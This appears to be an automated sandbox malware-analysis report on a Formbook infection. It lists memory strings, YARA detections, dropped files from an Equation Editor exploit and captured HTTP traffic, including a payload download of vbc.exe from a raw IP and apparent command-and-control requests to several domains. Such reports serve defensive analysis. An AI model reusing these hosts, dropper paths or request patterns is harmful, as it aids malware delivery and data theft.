Source: explorer.exe, 0000000A.00000000.551802023.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 0000000A.00000000.514429038.0000000000255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.554693627.0000000004650000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.516613622.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.551802023.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.554693627.0000000004650000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.516613622.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.502244002.00000000044E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.524903275.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.502426249.00000000045CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.505412639.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.521360714.00000000044E7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.524903275.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.502426249.00000000045CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.505412639.0000000008374000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.516613622.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.514429038.0000000000255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.514429038.0000000000255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000A.00000000.514429038.0000000000255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: global traffic	HTTP traffic detected: GET /30/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 65.2.143.8Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nt3f/?1bNHY2=e6AHDh_0Bf6p6lIp&4hfxh=zh9ZJvQDpuJ8FzfOF5/13POSojXlenAN5Q6v9e/Np9zFVZ+T+GW/a5eB04ukDkIff9AcOQ== HTTP/1.1Host: www.primerepro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nt3f/?4hfxh=nOM9fgGIZ+TfVsUq2Sm955WWmPaXUcfoEc+b9olF9adUCvzkQycvr3NYcYX3ACxTInTmwA==&1bNHY2=e6AHDh_0Bf6p6lIp HTTP/1.1Host: www.eagle-meter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nt3f/?1bNHY2=e6AHDh_0Bf6p6lIp&4hfxh=roQyhHJwfVxU2zOZOCh4/5oE96lXlhEDqwlN10SvmnnZcGUgQE2W+6Ro0cAGYyc6bdur0A== HTTP/1.1Host: www.saprove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nt3f/?4hfxh=JbDy7TRIU32tRRiWfFaEbpGMnCQxB75OBjVGZWj4WfhFoU9oPzFDuRetfANWR0lEorWalg==&1bNHY2=e6AHDh_0Bf6p6lIp HTTP/1.1Host: www.the-thanks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nt3f/?1bNHY2=e6AHDh_0Bf6p6lIp&4hfxh=XQiqgSh3QMW0nePllWUsxZUxyZ7Wg3kP4uBvWEaTkPp74lNhmE95Km3+29PmuNVvDyLfVA== HTTP/1.1Host: www.libertadysarmiento.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nt3f/?4hfxh=VPDo/gGljWIAkXRpnf2851ahKkwJgNah2gT2Xhg3gSLEGk9Hcz2Z/bSczfFocrENcd4Lnw==&1bNHY2=e6AHDh_0Bf6p6lIp HTTP/1.1Host: www.getinteriorsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.33959a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.33959a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2294dc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 4.2.vbc.exe.333ed80.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.333ed80.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.533651409.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.533651409.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.493228675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.493228675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.493954054.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.493954054.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.533831513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.533831513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.680092656.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.680092656.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.525819283.00000000097A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.525819283.00000000097A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.513806035.00000000097A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.513806035.00000000097A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.680132856.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.680132856.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.680038581.00000000000D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.680038581.00000000000D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.533708432.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.533708432.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.496236339.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.496236339.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.33959a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.33959a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2294dc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 4.2.vbc.exe.333ed80.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.333ed80.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.533651409.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.533651409.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.493228675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.493228675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.493954054.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.493954054.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.533831513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.533831513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.680092656.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.680092656.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.525819283.00000000097A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.525819283.00000000097A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.513806035.00000000097A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.513806035.00000000097A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.680132856.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.680132856.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.680038581.00000000000D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.680038581.00000000000D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.533708432.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.533708432.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.496236339.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.496236339.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00223896	4_2_00223896
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00220998	4_2_00220998
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00220BE8	4_2_00220BE8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00220BD9	4_2_00220BD9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00229CA8	4_2_00229CA8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00229C9A	4_2_00229C9A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00229F00	4_2_00229F00
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00229F10	4_2_00229F10
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00652FBF	4_2_00652FBF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041C078	9_2_0041C078
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041B9C0	9_2_0041B9C0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00408C80	9_2_00408C80
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402D87	9_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A7E0C6	9_2_00A7E0C6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AAD005	9_2_00AAD005
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A83040	9_2_00A83040
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A9905A	9_2_00A9905A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A7E2E9	9_2_00A7E2E9
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B21238	9_2_00B21238
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B263BF	9_2_00B263BF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A7F3CF	9_2_00A7F3CF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AA63DB	9_2_00AA63DB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A82305	9_2_00A82305
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACA37B	9_2_00ACA37B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A87353	9_2_00A87353
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A91489	9_2_00A91489
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AB5485	9_2_00AB5485
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ABD47D	9_2_00ABD47D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A9C5F0	9_2_00A9C5F0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A8351F	9_2_00A8351F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AC6540	9_2_00AC6540
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A84680	9_2_00A84680
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A8E6C1	9_2_00A8E6C1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B22622	9_2_00B22622
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00ACA634	9_2_00ACA634
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A8C7BC	9_2_00A8C7BC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B0579A	9_2_00B0579A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AB57C3	9_2_00AB57C3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B1F8EE	9_2_00B1F8EE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00AA286D	9_2_00AA286D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A8C85C	9_2_00A8C85C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A829B2	9_2_00A829B2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00B2098E	9_2_00B2098E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A969FE	9_2_00A969FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02761238	11_2_02761238
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026BE2E9	11_2_026BE2E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0270A37B	11_2_0270A37B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026C7353	11_2_026C7353
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026C2305	11_2_026C2305
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026BF3CF	11_2_026BF3CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026E63DB	11_2_026E63DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026C3040	11_2_026C3040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026D905A	11_2_026D905A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026ED005	11_2_026ED005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026BE0C6	11_2_026BE0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02762622	11_2_02762622
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026CE6C1	11_2_026CE6C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026C4680	11_2_026C4680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026F57C3	11_2_026F57C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026CC7BC	11_2_026CC7BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0274579A	11_2_0274579A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026FD47D	11_2_026FD47D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026D1489	11_2_026D1489
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026F5485	11_2_026F5485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026C351F	11_2_026C351F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026DC5F0	11_2_026DC5F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02773A83	11_2_02773A83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026E7B00	11_2_026E7B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0274DBDA	11_2_0274DBDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026BFBD7	11_2_026BFBD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0276CBA4	11_2_0276CBA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026E286D	11_2_026E286D
